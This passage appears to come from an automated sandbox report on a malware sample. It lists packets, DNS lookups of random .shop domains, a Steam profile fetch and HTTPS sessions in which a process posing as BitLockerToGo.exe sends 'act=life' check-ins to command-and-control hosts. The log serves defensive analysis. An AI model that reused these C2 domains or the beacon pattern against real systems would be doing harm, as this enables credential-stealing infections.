                                                                                                                                                          Oct 13, 2024 21:34:55.244362116 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.244370937 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.244421005 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.244427919 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.244529963 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.244591951 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.245168924 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.245192051 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.245202065 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.245207071 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.280880928 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:55.280926943 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.281006098 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:55.281291008 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:55.281308889 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.768702030 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.768778086 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.071321011 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.071352005 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.072309971 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.108249903 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.108272076 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.108439922 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.218041897 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.218178034 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.218229055 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.218244076 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.223952055 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.224004984 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.224014997 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.224231005 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.224283934 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.226794004 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.226814032 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.226826906 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.226834059 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.512912035 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.512944937 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.513067961 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.513824940 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.513839960 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.998614073 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.998795986 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.000082016 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.000089884 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.000855923 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.002304077 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.002530098 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.002554893 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.441442013 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.441524029 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.441797018 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.441797018 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.441837072 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.441852093 CEST44349712104.21.53.8192.168.2.7

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Oct 13, 2024 21:34:52.297250986 CEST5645353192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:52.317109108 CEST53564531.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.712513924 CEST6275453192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:53.721508980 CEST53627541.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.724742889 CEST6226053192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:53.734638929 CEST53622601.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.740374088 CEST6365453192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:53.750418901 CEST53636541.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.753153086 CEST5573153192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:53.762335062 CEST53557311.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.764790058 CEST4963853192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:53.773839951 CEST53496381.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.776070118 CEST5469853192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:53.785857916 CEST53546981.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.788496017 CEST6494553192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:53.797349930 CEST53649451.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.799618006 CEST5256053192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:53.809639931 CEST53525601.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:53.811860085 CEST6327653192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:53.818869114 CEST53632761.1.1.1192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.270369053 CEST5389153192.168.2.71.1.1.1
                                                                                                                                                          Oct 13, 2024 21:34:55.280117035 CEST53538911.1.1.1192.168.2.7

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Oct 13, 2024 21:34:52.297250986 CEST192.168.2.71.1.1.10x8a9cStandard query (0)nippydxmnwquo.shopA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.712513924 CEST192.168.2.71.1.1.10xc7c8Standard query (0)locatedblsoqp.shopA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.724742889 CEST192.168.2.71.1.1.10x665eStandard query (0)traineiwnqo.shopA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.740374088 CEST192.168.2.71.1.1.10xb7fbStandard query (0)condedqpwqm.shopA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.753153086 CEST192.168.2.71.1.1.10x97c5Standard query (0)evoliutwoqm.shopA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.764790058 CEST192.168.2.71.1.1.10xd9eeStandard query (0)millyscroqwp.shopA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.776070118 CEST192.168.2.71.1.1.10x23e6Standard query (0)stagedchheiqwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.788496017 CEST192.168.2.71.1.1.10x316bStandard query (0)stamppreewntnq.shopA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.799618006 CEST192.168.2.71.1.1.10xc83fStandard query (0)caffegclasiqwp.shopA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.811860085 CEST192.168.2.71.1.1.10x3a64Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:55.270369053 CEST192.168.2.71.1.1.10x4f0Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Oct 13, 2024 21:34:52.317109108 CEST1.1.1.1192.168.2.70x8a9cNo error (0)nippydxmnwquo.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:52.317109108 CEST1.1.1.1192.168.2.70x8a9cNo error (0)nippydxmnwquo.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.721508980 CEST1.1.1.1192.168.2.70xc7c8Name error (3)locatedblsoqp.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.734638929 CEST1.1.1.1192.168.2.70x665eName error (3)traineiwnqo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.750418901 CEST1.1.1.1192.168.2.70xb7fbName error (3)condedqpwqm.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.762335062 CEST1.1.1.1192.168.2.70x97c5Name error (3)evoliutwoqm.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.773839951 CEST1.1.1.1192.168.2.70xd9eeName error (3)millyscroqwp.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.785857916 CEST1.1.1.1192.168.2.70x23e6Name error (3)stagedchheiqwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.797349930 CEST1.1.1.1192.168.2.70x316bName error (3)stamppreewntnq.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.809639931 CEST1.1.1.1192.168.2.70xc83fName error (3)caffegclasiqwp.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:53.818869114 CEST1.1.1.1192.168.2.70x3a64No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:55.280117035 CEST1.1.1.1192.168.2.70x4f0No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                                                                          Oct 13, 2024 21:34:55.280117035 CEST1.1.1.1192.168.2.70x4f0No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • nippydxmnwquo.shop
                                                                                                                                                          • steamcommunity.com
                                                                                                                                                          • sergei-esenin.com

                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.749707188.114.96.34431568C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-10-13 19:34:53 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 8
                                                                                                                                                          Host: nippydxmnwquo.shop
                                                                                                                                                          2024-10-13 19:34:53 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                          2024-10-13 19:34:53 UTC833INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 13 Oct 2024 19:34:53 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=oeohh4cgtbhg6kikrar6jpi4mu; expires=Thu, 06 Feb 2025 13:21:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=umE4WPqGRZc2qYG5A7ProFIKAO%2F%2FkOi0knBR9KmIsjR39YZ7g1%2Fts8zzVxwmLMH5kCx5uL1KyMDSvcFNTl0x241KnSl1%2Barfil037OA%2B9yl8EZsq%2BKQ%2FvxUZ2Vg2mOrAeWvkQkI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8d21c5073fca7287-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-10-13 19:34:53 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                          2024-10-13 19:34:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.749708104.102.49.2544431568C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-10-13 19:34:54 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                          2024-10-13 19:34:55 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Date: Sun, 13 Oct 2024 19:34:55 GMT
                                                                                                                                                          Content-Length: 34837
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: sessionid=b2c26a1103d97c5dd06069b2; Path=/; Secure; SameSite=None
                                                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                          2024-10-13 19:34:55 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                          2024-10-13 19:34:55 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                          Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                          2024-10-13 19:34:55 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                          Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                                                          2024-10-13 19:34:55 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                          Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.749709104.21.53.84431568C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-10-13 19:34:56 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 8
                                                                                                                                                          Host: sergei-esenin.com
                                                                                                                                                          2024-10-13 19:34:56 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                          2024-10-13 19:34:56 UTC557INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 13 Oct 2024 19:34:56 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4EKyhjQDxaiUT0%2FTXyPZl9C1Vb5iPvLuyzkBKi6RSm59q%2BLIy4Og1kzlsSoPQrHdOZBBhlyLGfN8tL7lH5h22WtAaDuNa%2FWQ4X8mRm37DhIoX%2BrYVOxIiX7Uhr9%2FALJqvhBnkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8d21c5190de20c7e-EWR
                                                                                                                                                          2024-10-13 19:34:56 UTC812INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                          Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                          2024-10-13 19:34:56 UTC1369INData Raw: 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64
                                                                                                                                                          Data Ascii: tyles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById
                                                                                                                                                          2024-10-13 19:34:56 UTC1369INData Raw: 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                          Data Ascii: anagement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
